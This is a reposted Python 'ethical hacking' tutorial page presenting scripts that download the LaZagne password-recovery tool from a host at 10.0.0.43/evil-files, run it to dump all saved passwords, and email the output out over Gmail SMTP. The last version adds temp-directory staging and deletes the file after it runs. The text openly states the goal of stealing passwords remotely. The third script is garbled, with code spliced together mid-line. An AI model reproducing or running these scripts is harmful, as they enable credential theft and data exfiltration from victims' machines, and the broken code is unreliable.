Python Ethical Hacking - Malware Analysis(4)

发布时间：2020-12-20 10:26:53 所属栏目：Python 来源：网络整理

导读：DOWNLOAD_FILE Download files on a system. Once packaged properly will work on all operating systems. Simple but powerfull. Can be used in many situations: download _file + execute_command = download_and_execute download_file + execute_and_

DOWNLOAD_FILE

Download files on a system.
Once packaged properly will work on all operating systems.
Simple but powerfull.

Can be used in many situations:

download _file + execute_command = download_and_execute
download_file + execute_and_report = download_execute_and_report
...etc

#!/usr/bin/env python
import requests


def download(url):
    get_response = requests.get(url)
    file_name = url.split("/")[-1]
    with open(file_name,"wb") as out_file:
        out_file.write(get_response.content)


download("https://cdn.spacetelescope.org/archives/images/screen/potw1739a.jpg")

?DOWNLOAD_EXECUTE_AND_REPORT

Download files on a system.
Execute a command that uses this file.
Report results in our email.
Cross multi-Platform!!

Ex: remotely steal all stored passwords on a computer!

Using the LaZagne tool:https://github.com/AlessandroZ/LaZagne

lazagne.exe --help

?Use the following command to find all the passwords in the current system.

 lazagne.exe all

?Steal saved passwords remotely

#!/usr/bin/env python
import requests
import smtplib
import subprocess


def download(url):
    get_response = requests.get(url)
    file_name = url.split("/")[-1]
    with open(file_name,"wb") as out_file:
        out_file.write(get_response.content)


def send_mail(email,password,message):
    server = smtplib.SMTP("smtp.gmail.com",587)
    server.starttls()
    server.login(email,password)
    server.sendmail(email,email,message)
    server.quit()


download("http://10.0.0.43/evil-files/lazagne.exe")
result = subprocess.check_output("lazagne.exe all",shell=True)
print(result.decode())
send_mail("[email?protected]","2222211",result)

Optimize the Python Script - Interacting with the file system.?The evil file will be downloaded in the temp directory and removed after executed.?

#!/usr/bin/env python
import os
import smtplib
import subprocess
import requests
import tempfile


def download(url):
    get_response = requests.get(url)
    file_name = url.split("/")[-1]
    with open(file_name,message)
    server.quit()


temp_directory = tempfile.gettempdir()
os.chdir(temp_directory)
download("http://10.0.0.43/evil-files/lazagne.exe")
result = subprocess.check_output("lazagne.exe all",shell=True)
print(result.decode())
send_mail("[email?protected]","2222211",result)
os.remove("lazagne.exe")

（编辑：李大同）

【声明】本站内容均来自网络，其相关言论仅代表作者个人观点，不代表本站立场。若无意侵犯到您的权利，请及时与联系站长删除相关内容!